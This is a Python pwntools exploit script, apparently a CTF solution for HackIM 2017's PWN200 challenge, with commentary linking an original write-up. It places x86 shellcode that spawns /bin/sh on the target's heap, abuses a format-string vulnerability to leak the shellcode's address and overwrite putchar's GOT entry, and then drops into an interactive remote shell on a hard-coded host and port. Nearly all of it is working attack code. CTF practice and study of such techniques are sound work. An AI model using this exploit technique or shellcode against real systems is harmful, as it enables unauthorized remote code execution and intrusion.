
# HACKIM CTF - 2017
# Task: PWN200
# Author: Azz-Eddine DJEKMANI

import sys

from pwn import *
from libformatstr import *
#context.log_level = "debug"

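# Exploit preconditions, all visible in the addresses/technique below: the
# binary is non-PIE (fixed .got/.bss addresses), its GOT is writable (no full
# RELRO, otherwise the %n write would fault) and its heap is executable (no NX,
# otherwise jumping to heap shellcode would fault).
HOST = "34.198.96.6"
PORT = 9001
buffsize = 100  # size of the buffer the user-controlled format string lands in

# x86 (32-bit) shellcode, byte-for-byte as in the original.  Decoded:
#   xor eax,eax; mov al,0x30; add esp,eax      -> move esp above the live frame
#   xor al,al; push eax; push "//sh"; push "/bin"
#   mov ebx,esp; mov ecx,eax                    -> ebx="/bin//sh", ecx=0
#   mov al,0xb0; shr al,4; int 0x80             -> execve(ebx, 0, edx)
#   shr al,3; int 0x80                          -> second syscall if execve returns
# NOTE(review): edx (envp) is never zeroed, so execve relies on whatever edx
# holds at the moment the hijacked putchar() is called -- confirm on the target.
shellcode = b"\x31\xc0\xb0\x30\x01\xc4\x30\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\xb0\xb0\xc0\xe8\x04\xcd\x80\xc0\xe8\x03\xcd\x80"

putchar = 0x0804b038    # putchar@got.plt: overwritten so the next putchar() call jumps to the shellcode
book_list = 0x0804b054  # book_list@bss: pointer to the first "book", i.e. the heap copy of the shellcode
PREFIX_LEN = 16         # bytes the service echoes before the printf() output (the original sliced data[16:])


def inject_shellcode(cnx):
    """Menu option 1: store *shellcode* as a book so it lands on the heap.

    Each cnx.recv() drains whatever has arrived so far; a recvuntil() on the
    actual prompt text would be more deterministic, but the prompts are not
    reproduced in this script.  The second "1" answers a follow-up prompt whose
    meaning is not visible here (kept exactly as the original did).
    """
    cnx.recv()
    cnx.sendline(b"1")
    cnx.recv()
    cnx.sendline(shellcode)
    cnx.recv()
    cnx.sendline(b"1")
    cnx.recv()


def find_fmt_args(cnx):
    """Menu option 3 with a libformatstr pattern; return (offset, padding).

    offset is the printf argument index at which our buffer starts and padding
    the number of bytes needed to 4-byte align it -- both are reused for the
    leak and the GOT write so the three format strings agree with each other.
    """
    cnx.sendline(b"3")
    cnx.recv()
    cnx.sendline(make_pattern(buffsize))
    data = cnx.recv()
    return guess_argnum(data[PREFIX_LEN:], buffsize)


def leak_book_list(cnx, offset, padding):
    """Read the 4-byte pointer stored at book_list via "%<offset>$s".

    The format string is "A"*padding + p32(book_list) + "%<offset>$s", so the
    printf output is: echoed prefix, the padding, the raw address bytes, then
    the pointee bytes.  The original hard-coded "%11$s" (offset 11, padding 0);
    deriving it from find_fmt_args() keeps the leak and the write consistent.
    Raises RuntimeError if fewer than 4 pointee bytes came back (e.g. the
    pointer contains a NUL byte, which %s stops at).
    """
    cnx.sendline(b"3")
    cnx.recv()
    cnx.sendline(b"A" * padding + p32(book_list) + b"%%%d$s" % offset)
    leaked = cnx.recv()
    start = PREFIX_LEN + padding + 4
    raw = leaked[start:start + 4]
    if len(raw) != 4:
        raise RuntimeError("book_list leak too short: got %d byte(s)" % len(raw))
    return u32(raw)


def overwrite_got(cnx, offset, padding, target):
    """Menu option 3 again: write *target* into putchar@got.plt with %hn writes.

    send() rather than sendline(): the libformatstr payload must not carry a
    trailing newline into the buffer (as in the original).
    """
    fmt = FormatStr(buffsize)
    fmt[putchar] = target
    cnx.sendline(b"3")
    cnx.recv()
    cnx.send(fmt.payload(offset, padding))


def main():
    """Run the exploit; host and port may be overridden as argv[1] / argv[2]."""
    host = sys.argv[1] if len(sys.argv) > 1 else HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else PORT
    cnx = remote(host, port)

    inject_shellcode(cnx)

    offset, padding = find_fmt_args(cnx)
    print("[+] Padding: " + str(padding))
    print("[+] 0ffset: " + str(offset))

    leaked_addr = leak_book_list(cnx, offset, padding)
    print("[+] Shellcode Addresse: " + hex(leaked_addr))

    # After this write the service's next putchar() call lands in the shellcode.
    overwrite_got(cnx, offset, padding, leaked_addr)
    cnx.interactive("PWNED# ")


if __name__ == "__main__":
    main()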

Original writeup (https://gist.github.com/djekmani/cb2c85e199b0c58293a1d9bc3745c569).